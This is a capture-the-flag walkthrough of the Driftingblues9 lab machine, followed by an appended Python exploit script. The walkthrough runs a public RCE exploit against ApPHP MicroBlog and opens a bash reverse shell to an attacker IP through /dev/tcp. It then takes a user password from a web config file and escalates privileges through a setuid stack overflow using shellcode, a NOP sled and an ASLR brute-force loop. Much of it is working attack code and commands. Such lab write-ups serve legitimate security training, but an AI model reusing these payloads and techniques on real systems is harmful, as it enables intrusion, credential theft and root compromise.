The machine can be downloaded here: https://hackmyvm.eu/machines/machine.php?vm=Driftingblues9
Scan the ports with nmap first; only port 80 is open.
Open port 80 in a browser: it's a tiny blog.
Check the page source and we see the app name and version in an HTML comment:
<!-- This script was generated by ApPHP MicroBlog v.1.0.1 (http://www.apphp.com/php-microblog/) -->
Search exploit-db for a PoC for this version and use the one that gives RCE.
Run nc -nlvp 1234 in one terminal to listen on port 1234, then run the PoC in another terminal and give it this command to execute (192.168.56.150 is the attacker's IP): /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.56.150/1234 0>&1'
The listener then receives a reverse shell as the web server user.
Next we need to become the user clapton. His credentials are in /var/www/html/include/base.inc.php.
We use python to spawn a tty, then su to clapton with that password.
The last step is to pwn the setuid binary named input in /home/clapton.
Download the input file and check the file type and the security settings of the ELF (checksec ships with pwntools).
It's a 32-bit ELF with no protections enabled, so the stack is executable and we can run shellcode placed on it. That is good.
Open the file in your favorite disassembler. main only does a strcpy of argv[1] into a fixed-size stack buffer with no length check, which is the vulnerability; there is nothing else in the binary worth reusing.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char dest[159]; // [esp+11h] [ebp-9Fh] BYREF

  if ( argc <= 1 )
  {
    printf("Syntax: %s <input string>\n", *argv);
    exit(0);
  }
  strcpy(dest, argv[1]);
  return 0;
}
When we pass a long string it crashes, so we need the exact padding length that puts our bytes on the saved return address.
We use gdb-peda: create a pattern, crash the program with it, read the value that landed in EIP and look up its offset in the pattern.
If you don't use peda, you can use pattern_create.rb and pattern_offset.rb from /usr/share/metasploit-framework/tools/exploit/.
Because the VM has gdb too, we can run the binary under gdb there to check the calculation: with 171 bytes of padding followed by 'bbbb', EIP reads 0x62626262, which is 'bbbb'. So the length is right and we control the return address.
But if we run the program several times, we see that the esp value at the crash differs on each run, although it always falls in the 0xbf?????? range.
That's because ASLR is enabled on the VM, so the stack moves on every execution.
Our method is to put a long NOP sled in front of the shellcode, so that a guessed return address inside the range has a good chance of landing in the sled and sliding into the shellcode.
We use the classic 24-byte execve("/bin//sh") shellcode, which contains no NUL bytes (strcpy would stop at one): "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
Alternatively, we can generate shellcode with pwntools or msfvenom.
For pwntools, the command is:
python3 -c "from pwn import *;context(log_level='debug',arch='i386',os='linux');shellcode=asm(shellcraft.sh());print(shellcode)"
Then we wrap the program in a loop that runs it many times. The key to getting a shell is a long enough NOP sled and a return address that falls inside it: here I use a sled of 0x10000 bytes and the return address 0xbf901010 (the pwntools shellcraft.sh() bytes from above are used as the shellcode). A run that misses dies with a segfault and the loop continues; a run that hits drops us into a shell.
for a in {1..1000}; do echo -n $a; ./input $(python -c 'print "A" * 171 + "\x10\x10\x90\xbf" + "\x90" * 0x10000 + "jhh///sh/bin\x89\xe3h\x01\x01\x01\x01\x814$ri\x01\x011\xc9Qj\x04Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"');done
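The whole procedure above (pattern creation and offset lookup, the 'bbbb' probe, the sled-plus-shellcode payload, and the brute-force loop) collected into one script, as an added example that is not the walkthrough's own code. The numbers it uses (offset 171, 0x10000-byte sled, return address 0xbf901010, the classic execve shellcode) come from the walkthrough; the function names, the NUL/argv-length check and the loop's stop condition are assumptions of this example.

```python
"""Exploit helpers for the 'input' binary walked through above.

Added example, not the walkthrough's own code. Offset 171, the 0x10000-byte
sled, the return address 0xbf901010 and the shellcode come from the
walkthrough; the function names and the loop's stop condition are assumptions.
"""
import string
import struct
import subprocess
import sys
from itertools import product

# Classic NUL-free execve("/bin//sh") shellcode quoted in the walkthrough (24 bytes).
SHELLCODE = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")

# A single argv string may not exceed MAX_ARG_STRLEN (32 pages) on Linux.
MAX_ARG_STRLEN = 32 * 4096


def p32(value):
    """Pack a 32-bit value little-endian, the byte order x86 reads from the stack."""
    return struct.pack("<I", value)


def pattern_create(length):
    """Non-repeating pattern in the style of pattern_create.rb: every 4-byte
    window is unique, so the dword that ends up in EIP identifies its offset."""
    out = bytearray()
    for upper, lower, digit in product(string.ascii_uppercase,
                                       string.ascii_lowercase, string.digits):
        out += (upper + lower + digit).encode()
        if len(out) >= length:
            return bytes(out[:length])
    raise ValueError("a pattern longer than 20280 bytes would repeat")


def pattern_offset(pattern, eip_value):
    """Offset of the 4 pattern bytes that landed in EIP (the value gdb shows)."""
    idx = pattern.find(p32(eip_value))
    if idx < 0:
        raise ValueError("EIP value 0x%08x is not in the pattern" % eip_value)
    return idx


def probe_payload(offset, marker=b"bbbb"):
    """Padding plus a recognisable marker: EIP must read 0x62626262 under gdb."""
    return b"A" * offset + marker


def check_argv_safe(payload):
    """strcpy() stops at the first NUL and execve() cannot pass one in argv,
    so a NUL anywhere silently truncates the exploit. Fail loudly instead."""
    if b"\x00" in payload:
        raise ValueError("NUL byte at offset %d" % payload.index(b"\x00"))
    if len(payload) > MAX_ARG_STRLEN:
        raise ValueError("payload of %d bytes exceeds MAX_ARG_STRLEN" % len(payload))
    return True


def build_payload(offset, ret_addr, nop_len, shellcode=SHELLCODE):
    """padding | return address | NOP sled | shellcode.

    The sled sits right after the overwritten return address, so the guessed
    address only has to land somewhere in the next nop_len bytes of stack;
    a bigger sled means fewer guesses against ASLR."""
    payload = b"A" * offset + p32(ret_addr) + b"\x90" * nop_len + shellcode
    check_argv_safe(payload)
    return payload


def brute_force(binary, payload, tries=1000):
    """Re-run the target until the guess lands in the sled. A miss dies from a
    signal (negative returncode, -11 for SIGSEGV); a hit spawns /bin/sh on our
    terminal and the loop ends once that shell exits. Returns the winning try."""
    for attempt in range(1, tries + 1):
        if subprocess.call([binary, payload]) >= 0:
            return attempt
    return None


if __name__ == "__main__":
    # Usage on the VM: python3 exploit.py /home/clapton/input
    if len(sys.argv) != 2:
        sys.exit("usage: %s <path to input binary>" % sys.argv[0])
    hit = brute_force(sys.argv[1], build_payload(171, 0xbf901010, 0x10000))
    print("shell on try %d" % hit if hit else "no hit, try a bigger sled")
```

The NUL check is the caveat that bites most often with strcpy targets: a return address such as 0xbf900000 packs to "\x00\x00\x90\xbf", strcpy stops at the first NUL and the sled never reaches the stack, so the script refuses such an address instead of silently brute-forcing with a truncated payload.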
Here is a great tutorial on this kind of stack overflow with ASLR brute forcing:
https://blog.geoda-security.com/2017/02/lord-of-r00t-walkthrough.html